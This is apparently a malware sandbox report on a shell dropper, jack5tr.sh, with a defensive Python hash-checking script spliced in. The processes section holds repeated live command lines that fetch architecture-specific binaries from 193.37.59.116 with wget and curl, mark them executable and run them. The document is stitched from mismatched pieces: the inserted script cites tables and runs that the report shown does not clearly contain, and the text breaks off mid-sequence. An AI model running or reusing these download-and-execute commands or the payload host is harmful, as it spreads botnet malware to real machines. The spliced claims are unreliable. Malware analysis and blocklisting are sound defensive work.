/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/m68k]

/usr/bin/curl

[curl -O http://193.37.59.116/m68k]

/usr/bin/cat

[cat m68k]

/usr/bin/chmod

[chmod +x arc arm arm5 arm6 arm7 config-err-YYA4jL jack5tr.sh m68k mips mpsl ppc RUN snap-private-tmp spc ssh-CtIa6Hesc4Zr systemd-private-2131a8123ede4b3da518e768658e36bc-colord.service-4QnN1h systemd-private-2131a8123ede4b3da518e768658e36bc-ModemManager.service-XCKBwi systemd-private-2131a8123ede4b3da518e768658e36bc-switcheroo-control.service-tzUM8h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-logind.service-9dxLXg systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-resolved.service-kIlJ7h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-timedated.service-GQPzhi systemd-private-2131a8123ede4b3da518e768658e36bc-upower.service-4Zcywi x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/sh4]

/usr/bin/curl

[curl -O http://193.37.59.116/sh4]

/usr/bin/cat

[cat sh4]

/usr/bin/chmod

[chmod +x arc arm arm5 arm6 arm7 config-err-YYA4jL jack5tr.sh m68k mips mpsl ppc RUN sh4 snap-private-tmp spc ssh-CtIa6Hesc4Zr systemd-private-2131a8123ede4b3da518e768658e36bc-colord.service-4QnN1h systemd-private-2131a8123ede4b3da518e768658e36bc-ModemManager.service-XCKBwi systemd-private-2131a8123ede4b3da518e768658e36bc-switcheroo-control.service-tzUM8h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-logind.service-9dxLXg systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-resolved.service-kIlJ7h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-timedated.service-GQPzhi systemd-private-2131a8123ede4b3da518e768658e36bc-upower.service-4Zcywi x86 x86_64]

/tmp/RUN

[./RUN]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 N/A udp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp
GB 185.125.190.48:80 connectivity-check.ubuntu.com tcp

Files

/tmp/x86

MD5 c4a3f27654d167d92ac6df60a02b40e2
SHA1 b1707a6ada4a6538e7595cbbdd2cd3b3d2294166
SHA256 9b31f7eb1e2b28c5497a06862119e0152893e8f80e2f5d508d3da577c3a5b100
SHA512 ee1fd253404678b44d026310d0ec655057602be0a83d2b9ae6e4eb0c357f74900fcaea430d8ced18d6debb8053bbdf4db39b7900b33080ce735ae87b25317f66

/tmp/mips

MD5 038943a024bba0e623ee0fc71c0e9dc4
SHA1 daaffb7cab5f0b1973d602b1f6d8c8f35600dc0b
SHA256 28686b90cfd05ece614f0d3b36993a64be26cd550d836c576b2622b2e1955dbb
SHA512 3e6c767298d62657a8217d4258bea76bbbb4abb0b85423045a2eca691399d56952abad3197f501f4bbf71eee2fc30fd017cec58171274bb6021789b597871b07

/tmp/arc

MD5 154506d20dcd8502b3820a2912b697e9
SHA1 55c207a1c0aeabc6df6d0307f11a03137139d701
SHA256 5937f6d6dadc5b9c5b3ad04297d3838d6c038ace39d0021b3055f09dd31d4c5c
SHA512 aeeb083e7bc6e5e8701572f91a5731148f1b93ebe3ab2ebd6d10526f08771601d6f79450f22a5cb03b2d05e54a4bb5fde176d541a6cbc5893d64f9b8621c0112

/tmp/x86_64

MD5 74eff98ceea934700653d0c0620419f8
SHA1 037df252464667dbcdc6f4fde3ff9043a3b76909
SHA256 7bf34fcdc8ad5964197369b95f1e05c98ac68890aa4a451204bac5a8a2426f89
SHA512 81f6a484bf3dddfa9c0b574f207accde90b631545907eb2d15565e6ffdbbb177c5c97733090a0cac83d775007256a4ff67848fbbe95faa19adb199a312a6573c

/tmp/mpsl

MD5 eba2a5a74d5beba7b9f903cfe07f9796
SHA1 012af86b452d7e7f82bbd45b5bbef672d2b25c67
SHA256 4c67bc4e9d0abfbccff5c49a713a3a4bfa11cdaa7a13a294733aedf9f5d7bcea
SHA512 a35aa4ebfab6a69a76a3ea31c52ba27f8a5b306b54ed1f732f18f8ad61f1dea57ea5af0354d604cfdb6769419e0a9a44f10545c1f1a27ad018ec730b9fb480be

/tmp/arm

MD5 6b1fc0e45d31470659fe0e295bc63d4e
SHA1 ce54569f5eefe03f56d5df2df3fe4830b0c9f177
SHA256 6f942d2d27fea02c90ec772b8523891771a1ae6c4f05eecc3e0e3d8fa4776f22
SHA512 f3a3cc1705764a3be4e725d10ae10710d4a09750e629c8cf07974907ac88858bfa54bc86cca6947e51de468fe654669b751c48ee2e234c53f4f001b29fdb9fea

/tmp/RUN

MD5 9c1344aa17dc266ff8f8637b2becfc46
SHA1 2dedb0abaf75446902f162dc8fc6e9b04fb9a8ee
SHA256 423e707b0c9e2d015f8f46df9053bbe469f240b7e1b5f9248f3172eecb36e4e4
SHA512 382a31d139ee354d0078c06de83a3cce1cfe568c45b0b6b6586e954d0fc048ded37227797fe078ffcdd5539c2f70fd8338b5b6d72fb3a3e7f22230deacbb1da1

/tmp/arm5

MD5 fc7db008f770f37ccb16e8d23f9780ae
SHA1 acd2865df9fec74fdafb227ce3136b715bb998b0
SHA256 857587a2dc176d97becbd0d400804245e392fd87f92bb7ace51865619eb0a7db
SHA512 c0e126cb47cbcd469d7b8b99ae7b5cb4cb25444adb91586acf02c36d9d21f221d897d0c2ba989371ea165a436ed49320219b074e5bb10afd0b2defb4319f097c

/tmp/arm6

MD5 d6227412be050807781b974181739db6
SHA1 14d20849fc59a62ed7f713afda3d9dda4cc2c850
SHA256 e559985c126f6872d3211cd971a7d8a64a6d17e247b5b14d0a7d85f9ad29ce09
SHA512 7a58d6d56f24f1064262de862372531e4cb7967373a4253a2ddc631a195373102fbc19178393f9c568b6b977641bf7bf5b283ca11f033f93fdadfa4789bc9c76

/tmp/arm7

MD5 d0084c21e35f40b71450406d0298e622
SHA1 f2ce386f6ba9afdb7f95272ab867c913b0802cd9
SHA256 9339521da875e8f082bd738ca8dc528d04ec605b19f46da59c55690f3bcd624f
SHA512 0f6618d607368f2251c48c9daa4d378ca89a6a053c7f5a981ad7e0d9683aa242d12f38b6f476dbbb36abd6ba2d627267cb3b9494bf3c4af40615c440be26f727

/tmp/ppc

MD5 9b27ba0a33c0ecaf4c48bc1fdabf2538
SHA1 d568ee55ba8476a9121f9f9c6dbe4e9e18cbb266
SHA256 6ad5fe25bc0730429eb72d60b5e841df775f5a6a08bc1c61edd182c7d9a41618
SHA512 1428b89fbf2b432783eeef4e1362c840d92072c73490bef5f6c13e14de1cb8e8260adc323bfd433992be158dfd284ba21cabba3404527638cdbcdbfabd86baea

/tmp/spc

MD5 839129f80935155dff6a2db49753d6a9
SHA1 d0f9e58eb29c5fcf88b4bbdfe7e447dd9ed9b8ba
SHA256 073994fa01d7e8d34a63c9e1a1a45005f52f387c1166768ef419afb911ad5457
SHA512 ef2ce2ebb97feb7d955cae8f3f85bea2ab02b312efad8580bd7efc92684dc6cb0343c2c8f561ad8c4a9e2e40580585754d0ea214099d37c862629c5bd8b913c3

/tmp/m68k

MD5 e6391e323b334b1257f36bb2fcb34e25
SHA1 1532d7dd78fb0b0263ee0df4ab3d007a68e45c41
SHA256 66d4651d0746e2ac8801b370c3600e91354b65746ff6b636930180682a5c1728
SHA512 b4bad5f003ccec3aaa5f412ffebec85d4fd0ba12d7a53abad056fc4a8ba7392967812b886d32ce2e54d28de018a39c51980a724149ab98b7c23b589a3f631958

/tmp/sh4

MD5 f26f51b05d46bea29bcab58abb1a9ec1
SHA1 8e527459d9d4c5c8b4ac161bdf36f56c89939fbf
SHA256 ace829355d3f8c1b1d22f8e634de8a0719d4e266b1f631d591cc1168f2ce4466
SHA512 b60304f2fb247d8a171490d88183c7b56ab9458c39dae0cbd255145c5e463f5c7d78dbcda73c04f2eb3e33cff003c061473d86bb821d60bac12353506281ccea
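The Files table above lists a SHA256 for each of the thirteen architecture payloads and for /tmp/RUN, the file the sample actually executes. Two things are worth verifying before those values go into a blocklist: whether the server returned distinct bytes for every path (rather than one error page under thirteen names), and whether the hashed /tmp/RUN equals any single payload. A third check is possible because the behavioral9 Files table further down repeats five of the payloads: comparing the two runs shows whether the server served identical bytes to both sandboxes. The script below is an added example and is not part of the sandbox report; every hash in it is copied from the report's tables, and the only new names are the helper functions themselves.

```python
"""Cross-checks on the dropped-file hashes from the behavioral7 Files table.

Added example, not part of the sandbox report. All hash values are copied
from the report; the functions derive what an analyst checks before turning
them into a blocklist.
"""
import re

HEX64 = re.compile(r"^[0-9a-f]{64}$")

# behavioral7 Files table: payload name -> SHA256
B7_PAYLOADS = {
    "x86":    "9b31f7eb1e2b28c5497a06862119e0152893e8f80e2f5d508d3da577c3a5b100",
    "mips":   "28686b90cfd05ece614f0d3b36993a64be26cd550d836c576b2622b2e1955dbb",
    "arc":    "5937f6d6dadc5b9c5b3ad04297d3838d6c038ace39d0021b3055f09dd31d4c5c",
    "x86_64": "7bf34fcdc8ad5964197369b95f1e05c98ac68890aa4a451204bac5a8a2426f89",
    "mpsl":   "4c67bc4e9d0abfbccff5c49a713a3a4bfa11cdaa7a13a294733aedf9f5d7bcea",
    "arm":    "6f942d2d27fea02c90ec772b8523891771a1ae6c4f05eecc3e0e3d8fa4776f22",
    "arm5":   "857587a2dc176d97becbd0d400804245e392fd87f92bb7ace51865619eb0a7db",
    "arm6":   "e559985c126f6872d3211cd971a7d8a64a6d17e247b5b14d0a7d85f9ad29ce09",
    "arm7":   "9339521da875e8f082bd738ca8dc528d04ec605b19f46da59c55690f3bcd624f",
    "ppc":    "6ad5fe25bc0730429eb72d60b5e841df775f5a6a08bc1c61edd182c7d9a41618",
    "spc":    "073994fa01d7e8d34a63c9e1a1a45005f52f387c1166768ef419afb911ad5457",
    "m68k":   "66d4651d0746e2ac8801b370c3600e91354b65746ff6b636930180682a5c1728",
    "sh4":    "ace829355d3f8c1b1d22f8e634de8a0719d4e266b1f631d591cc1168f2ce4466",
}
# /tmp/RUN as hashed by the sandbox in behavioral7.
B7_RUN = "423e707b0c9e2d015f8f46df9053bbe469f240b7e1b5f9248f3172eecb36e4e4"

# behavioral9 Files table (the five payloads the report lists for that run).
B9_PAYLOADS = {
    "x86":    "9b31f7eb1e2b28c5497a06862119e0152893e8f80e2f5d508d3da577c3a5b100",
    "mips":   "28686b90cfd05ece614f0d3b36993a64be26cd550d836c576b2622b2e1955dbb",
    "arc":    "5937f6d6dadc5b9c5b3ad04297d3838d6c038ace39d0021b3055f09dd31d4c5c",
    "x86_64": "7bf34fcdc8ad5964197369b95f1e05c98ac68890aa4a451204bac5a8a2426f89",
    "mpsl":   "4c67bc4e9d0abfbccff5c49a713a3a4bfa11cdaa7a13a294733aedf9f5d7bcea",
}


def malformed(hashes):
    """Names whose value is not a lowercase 64-hex SHA256 (catches transcription slips)."""
    return sorted(n for n, h in hashes.items() if not HEX64.match(h))


def duplicate_payloads(payloads):
    """Groups of payload names sharing one hash. Empty means the server returned
    distinct bytes for every path, not a single error page under many names."""
    by_hash = {}
    for name, h in payloads.items():
        by_hash.setdefault(h, []).append(name)
    return [sorted(names) for names in by_hash.values() if len(names) > 1]


def payloads_matching_run(run_hash, payloads):
    """Payload names whose bytes equal the hashed /tmp/RUN. Empty for this report:
    the RUN that was hashed is not a byte-identical copy of any one payload, so a
    blocklist built from payload hashes alone would miss the executed file."""
    return sorted(n for n, h in payloads.items() if h == run_hash)


def cross_run_mismatches(run_a, run_b):
    """Names present in both runs whose hashes differ, i.e. the server handed
    different bytes to different sandboxes. Empty for the five overlapping names."""
    return sorted(n for n in run_a.keys() & run_b.keys() if run_a[n] != run_b[n])


def blocklist(*hash_maps, extra=()):
    """Deduplicated SHA256 list covering every dropped file, RUN included."""
    hashes = set(extra)
    for m in hash_maps:
        hashes.update(m.values())
    return sorted(hashes)


if __name__ == "__main__":
    print("malformed:", malformed(B7_PAYLOADS) + malformed({"RUN": B7_RUN}))
    print("duplicate payloads:", duplicate_payloads(B7_PAYLOADS))
    print("payloads equal to RUN:", payloads_matching_run(B7_RUN, B7_PAYLOADS))
    print("behavioral7 vs behavioral9 mismatches:",
          cross_run_mismatches(B7_PAYLOADS, B9_PAYLOADS))
    print(len(blocklist(B7_PAYLOADS, B9_PAYLOADS, extra=[B7_RUN])), "hashes to block")
```

On this report the checks come out as thirteen distinct payloads, no payload equal to the hashed /tmp/RUN, no differences between the two runs for the overlapping files, and fourteen hashes in the combined blocklist.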

Analysis: behavioral9

Detonation Overview

Submitted

2024-08-29 19:31

Reported

2024-08-29 19:36

Platform

ubuntu2404-amd64-20240729-en

Max time kernel

2s

Max time network

131s

Command Line

[/tmp/jack5tr.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/arm6 /usr/bin/curl N/A
File opened for modification /tmp/mpsl /usr/bin/curl N/A
File opened for modification /tmp/arm5 /usr/bin/curl N/A
File opened for modification /tmp/x86_64 /usr/bin/curl N/A
File opened for modification /tmp/arc /usr/bin/curl N/A
File opened for modification /tmp/arm7 /usr/bin/curl N/A
File opened for modification /tmp/ppc /usr/bin/curl N/A
File opened for modification /tmp/x86 /usr/bin/curl N/A
File opened for modification /tmp/mips /usr/bin/curl N/A
File opened for modification /tmp/arm /usr/bin/curl N/A
File opened for modification /tmp/spc /usr/bin/curl N/A
File opened for modification /tmp/m68k /usr/bin/curl N/A
File opened for modification /tmp/sh4 /usr/bin/curl N/A
File opened for modification /tmp/RUN /tmp/jack5tr.sh N/A

cURL User-Agent

Description Indicator Process Target
HTTP User-Agent header curl/8.5.0 N/A N/A
HTTP User-Agent header curl/8.5.0 N/A N/A
HTTP User-Agent header curl/8.5.0 N/A N/A
HTTP User-Agent header curl/8.5.0 N/A N/A
HTTP User-Agent header curl/8.5.0 N/A N/A
HTTP User-Agent header curl/8.5.0 N/A N/A
HTTP User-Agent header curl/8.5.0 N/A N/A
HTTP User-Agent header curl/8.5.0 N/A N/A
HTTP User-Agent header curl/8.5.0 N/A N/A
HTTP User-Agent header curl/8.5.0 N/A N/A
HTTP User-Agent header curl/8.5.0 N/A N/A
HTTP User-Agent header curl/8.5.0 N/A N/A
HTTP User-Agent header curl/8.5.0 N/A N/A

Processes

/tmp/jack5tr.sh

[/tmp/jack5tr.sh]

/usr/bin/wget

[wget http://193.37.59.116/x86]

/usr/bin/curl

[curl -O http://193.37.59.116/x86]

/usr/bin/cat

[cat x86]

/usr/bin/chmod

[chmod +x RUN gdm3-config-err-C8WIzM gdm3-config-err-MO8hLs jack5tr.sh snap-private-tmp systemd-private-8202662168a748329c332a15329b16fc-ModemManager.service-jb5ElP systemd-private-8202662168a748329c332a15329b16fc-colord.service-KpNsD7 systemd-private-8202662168a748329c332a15329b16fc-polkit.service-f2eDNt systemd-private-8202662168a748329c332a15329b16fc-power-profiles-daemon.service-aFsFWI systemd-private-8202662168a748329c332a15329b16fc-switcheroo-control.service-adDzqa systemd-private-8202662168a748329c332a15329b16fc-systemd-logind.service-R54yfE systemd-private-8202662168a748329c332a15329b16fc-systemd-oomd.service-MmyGsz systemd-private-8202662168a748329c332a15329b16fc-systemd-resolved.service-UJC15i systemd-private-8202662168a748329c332a15329b16fc-systemd-timedated.service-2GUQAn systemd-private-8202662168a748329c332a15329b16fc-upower.service-nAcD3p x86]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/mips]

/usr/bin/curl

[curl -O http://193.37.59.116/mips]

/usr/bin/cat

[cat mips]

/usr/bin/chmod

[chmod +x RUN gdm3-config-err-C8WIzM gdm3-config-err-MO8hLs jack5tr.sh mips snap-private-tmp systemd-private-8202662168a748329c332a15329b16fc-ModemManager.service-jb5ElP systemd-private-8202662168a748329c332a15329b16fc-colord.service-KpNsD7 systemd-private-8202662168a748329c332a15329b16fc-polkit.service-f2eDNt systemd-private-8202662168a748329c332a15329b16fc-power-profiles-daemon.service-aFsFWI systemd-private-8202662168a748329c332a15329b16fc-switcheroo-control.service-adDzqa systemd-private-8202662168a748329c332a15329b16fc-systemd-logind.service-R54yfE systemd-private-8202662168a748329c332a15329b16fc-systemd-oomd.service-MmyGsz systemd-private-8202662168a748329c332a15329b16fc-systemd-resolved.service-UJC15i systemd-private-8202662168a748329c332a15329b16fc-systemd-timedated.service-2GUQAn systemd-private-8202662168a748329c332a15329b16fc-upower.service-nAcD3p x86]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/arc]

/usr/bin/curl

[curl -O http://193.37.59.116/arc]

/usr/bin/cat

[cat arc]

/usr/bin/chmod

[chmod +x RUN arc gdm3-config-err-C8WIzM gdm3-config-err-MO8hLs jack5tr.sh mips snap-private-tmp systemd-private-8202662168a748329c332a15329b16fc-ModemManager.service-jb5ElP systemd-private-8202662168a748329c332a15329b16fc-colord.service-KpNsD7 systemd-private-8202662168a748329c332a15329b16fc-polkit.service-f2eDNt systemd-private-8202662168a748329c332a15329b16fc-power-profiles-daemon.service-aFsFWI systemd-private-8202662168a748329c332a15329b16fc-switcheroo-control.service-adDzqa systemd-private-8202662168a748329c332a15329b16fc-systemd-logind.service-R54yfE systemd-private-8202662168a748329c332a15329b16fc-systemd-oomd.service-MmyGsz systemd-private-8202662168a748329c332a15329b16fc-systemd-resolved.service-UJC15i systemd-private-8202662168a748329c332a15329b16fc-systemd-timedated.service-2GUQAn systemd-private-8202662168a748329c332a15329b16fc-upower.service-nAcD3p x86]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/x86_64]

/usr/bin/curl

[curl -O http://193.37.59.116/x86_64]

/usr/bin/cat

[cat x86_64]

/usr/bin/chmod

[chmod +x RUN arc gdm3-config-err-C8WIzM gdm3-config-err-MO8hLs jack5tr.sh mips snap-private-tmp systemd-private-8202662168a748329c332a15329b16fc-ModemManager.service-jb5ElP systemd-private-8202662168a748329c332a15329b16fc-colord.service-KpNsD7 systemd-private-8202662168a748329c332a15329b16fc-polkit.service-f2eDNt systemd-private-8202662168a748329c332a15329b16fc-power-profiles-daemon.service-aFsFWI systemd-private-8202662168a748329c332a15329b16fc-switcheroo-control.service-adDzqa systemd-private-8202662168a748329c332a15329b16fc-systemd-logind.service-R54yfE systemd-private-8202662168a748329c332a15329b16fc-systemd-oomd.service-MmyGsz systemd-private-8202662168a748329c332a15329b16fc-systemd-resolved.service-UJC15i systemd-private-8202662168a748329c332a15329b16fc-systemd-timedated.service-2GUQAn systemd-private-8202662168a748329c332a15329b16fc-upower.service-nAcD3p x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/mpsl]

/usr/bin/curl

[curl -O http://193.37.59.116/mpsl]

/usr/bin/cat

[cat mpsl]

/usr/bin/chmod

[chmod +x RUN arc gdm3-config-err-C8WIzM gdm3-config-err-MO8hLs jack5tr.sh mips mpsl snap-private-tmp systemd-private-8202662168a748329c332a15329b16fc-ModemManager.service-jb5ElP systemd-private-8202662168a748329c332a15329b16fc-colord.service-KpNsD7 systemd-private-8202662168a748329c332a15329b16fc-polkit.service-f2eDNt systemd-private-8202662168a748329c332a15329b16fc-power-profiles-daemon.service-aFsFWI systemd-private-8202662168a748329c332a15329b16fc-switcheroo-control.service-adDzqa systemd-private-8202662168a748329c332a15329b16fc-systemd-logind.service-R54yfE systemd-private-8202662168a748329c332a15329b16fc-systemd-oomd.service-MmyGsz systemd-private-8202662168a748329c332a15329b16fc-systemd-resolved.service-UJC15i systemd-private-8202662168a748329c332a15329b16fc-systemd-timedated.service-2GUQAn systemd-private-8202662168a748329c332a15329b16fc-upower.service-nAcD3p x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/arm]

/usr/bin/curl

[curl -O http://193.37.59.116/arm]

/usr/bin/cat

[cat arm]

/usr/bin/chmod

[chmod +x RUN arc arm gdm3-config-err-C8WIzM gdm3-config-err-MO8hLs jack5tr.sh mips mpsl snap-private-tmp systemd-private-8202662168a748329c332a15329b16fc-ModemManager.service-jb5ElP systemd-private-8202662168a748329c332a15329b16fc-colord.service-KpNsD7 systemd-private-8202662168a748329c332a15329b16fc-polkit.service-f2eDNt systemd-private-8202662168a748329c332a15329b16fc-power-profiles-daemon.service-aFsFWI systemd-private-8202662168a748329c332a15329b16fc-switcheroo-control.service-adDzqa systemd-private-8202662168a748329c332a15329b16fc-systemd-logind.service-R54yfE systemd-private-8202662168a748329c332a15329b16fc-systemd-oomd.service-MmyGsz systemd-private-8202662168a748329c332a15329b16fc-systemd-resolved.service-UJC15i systemd-private-8202662168a748329c332a15329b16fc-systemd-timedated.service-2GUQAn systemd-private-8202662168a748329c332a15329b16fc-upower.service-nAcD3p x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/arm5]

/usr/bin/curl

[curl -O http://193.37.59.116/arm5]

/usr/bin/cat

[cat arm5]

/usr/bin/chmod

[chmod +x RUN arc arm arm5 gdm3-config-err-C8WIzM gdm3-config-err-MO8hLs jack5tr.sh mips mpsl snap-private-tmp systemd-private-8202662168a748329c332a15329b16fc-ModemManager.service-jb5ElP systemd-private-8202662168a748329c332a15329b16fc-colord.service-KpNsD7 systemd-private-8202662168a748329c332a15329b16fc-polkit.service-f2eDNt systemd-private-8202662168a748329c332a15329b16fc-power-profiles-daemon.service-aFsFWI systemd-private-8202662168a748329c332a15329b16fc-switcheroo-control.service-adDzqa systemd-private-8202662168a748329c332a15329b16fc-systemd-logind.service-R54yfE systemd-private-8202662168a748329c332a15329b16fc-systemd-oomd.service-MmyGsz systemd-private-8202662168a748329c332a15329b16fc-systemd-resolved.service-UJC15i systemd-private-8202662168a748329c332a15329b16fc-systemd-timedated.service-2GUQAn systemd-private-8202662168a748329c332a15329b16fc-upower.service-nAcD3p x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/arm6]

/usr/bin/curl

[curl -O http://193.37.59.116/arm6]

/usr/bin/cat

[cat arm6]

/usr/bin/chmod

[chmod +x RUN arc arm arm5 arm6 gdm3-config-err-C8WIzM gdm3-config-err-MO8hLs jack5tr.sh mips mpsl snap-private-tmp systemd-private-8202662168a748329c332a15329b16fc-ModemManager.service-jb5ElP systemd-private-8202662168a748329c332a15329b16fc-colord.service-KpNsD7 systemd-private-8202662168a748329c332a15329b16fc-polkit.service-f2eDNt systemd-private-8202662168a748329c332a15329b16fc-power-profiles-daemon.service-aFsFWI systemd-private-8202662168a748329c332a15329b16fc-switcheroo-control.service-adDzqa systemd-private-8202662168a748329c332a15329b16fc-systemd-logind.service-R54yfE systemd-private-8202662168a748329c332a15329b16fc-systemd-oomd.service-MmyGsz systemd-private-8202662168a748329c332a15329b16fc-systemd-resolved.service-UJC15i systemd-private-8202662168a748329c332a15329b16fc-systemd-timedated.service-2GUQAn systemd-private-8202662168a748329c332a15329b16fc-upower.service-nAcD3p x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/arm7]

/usr/bin/curl

[curl -O http://193.37.59.116/arm7]

/usr/bin/cat

[cat arm7]

/usr/bin/chmod

[chmod +x RUN arc arm arm5 arm6 arm7 gdm3-config-err-C8WIzM gdm3-config-err-MO8hLs jack5tr.sh mips mpsl snap-private-tmp systemd-private-8202662168a748329c332a15329b16fc-ModemManager.service-jb5ElP systemd-private-8202662168a748329c332a15329b16fc-colord.service-KpNsD7 systemd-private-8202662168a748329c332a15329b16fc-polkit.service-f2eDNt systemd-private-8202662168a748329c332a15329b16fc-power-profiles-daemon.service-aFsFWI systemd-private-8202662168a748329c332a15329b16fc-switcheroo-control.service-adDzqa systemd-private-8202662168a748329c332a15329b16fc-systemd-logind.service-R54yfE systemd-private-8202662168a748329c332a15329b16fc-systemd-oomd.service-MmyGsz systemd-private-8202662168a748329c332a15329b16fc-systemd-resolved.service-UJC15i systemd-private-8202662168a748329c332a15329b16fc-systemd-timedated.service-2GUQAn systemd-private-8202662168a748329c332a15329b16fc-upower.service-nAcD3p x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/ppc]

/usr/bin/curl

[curl -O http://193.37.59.116/ppc]

/usr/bin/cat

[cat ppc]

/usr/bin/chmod

[chmod +x RUN arc arm arm5 arm6 arm7 gdm3-config-err-C8WIzM gdm3-config-err-MO8hLs jack5tr.sh mips mpsl ppc snap-private-tmp systemd-private-8202662168a748329c332a15329b16fc-ModemManager.service-jb5ElP systemd-private-8202662168a748329c332a15329b16fc-colord.service-KpNsD7 systemd-private-8202662168a748329c332a15329b16fc-polkit.service-f2eDNt systemd-private-8202662168a748329c332a15329b16fc-power-profiles-daemon.service-aFsFWI systemd-private-8202662168a748329c332a15329b16fc-switcheroo-control.service-adDzqa systemd-private-8202662168a748329c332a15329b16fc-systemd-logind.service-R54yfE systemd-private-8202662168a748329c332a15329b16fc-systemd-oomd.service-MmyGsz systemd-private-8202662168a748329c332a15329b16fc-systemd-resolved.service-UJC15i systemd-private-8202662168a748329c332a15329b16fc-systemd-timedated.service-2GUQAn systemd-private-8202662168a748329c332a15329b16fc-upower.service-nAcD3p x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/spc]

/usr/bin/curl

[curl -O http://193.37.59.116/spc]

/usr/bin/cat

[cat spc]

/usr/bin/chmod

[chmod +x RUN arc arm arm5 arm6 arm7 gdm3-config-err-C8WIzM gdm3-config-err-MO8hLs jack5tr.sh mips mpsl ppc snap-private-tmp spc systemd-private-8202662168a748329c332a15329b16fc-ModemManager.service-jb5ElP systemd-private-8202662168a748329c332a15329b16fc-colord.service-KpNsD7 systemd-private-8202662168a748329c332a15329b16fc-polkit.service-f2eDNt systemd-private-8202662168a748329c332a15329b16fc-power-profiles-daemon.service-aFsFWI systemd-private-8202662168a748329c332a15329b16fc-switcheroo-control.service-adDzqa systemd-private-8202662168a748329c332a15329b16fc-systemd-logind.service-R54yfE systemd-private-8202662168a748329c332a15329b16fc-systemd-oomd.service-MmyGsz systemd-private-8202662168a748329c332a15329b16fc-systemd-resolved.service-UJC15i systemd-private-8202662168a748329c332a15329b16fc-systemd-timedated.service-2GUQAn systemd-private-8202662168a748329c332a15329b16fc-upower.service-nAcD3p x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/m68k]

/usr/bin/curl

[curl -O http://193.37.59.116/m68k]

/usr/bin/cat

[cat m68k]

/usr/bin/chmod

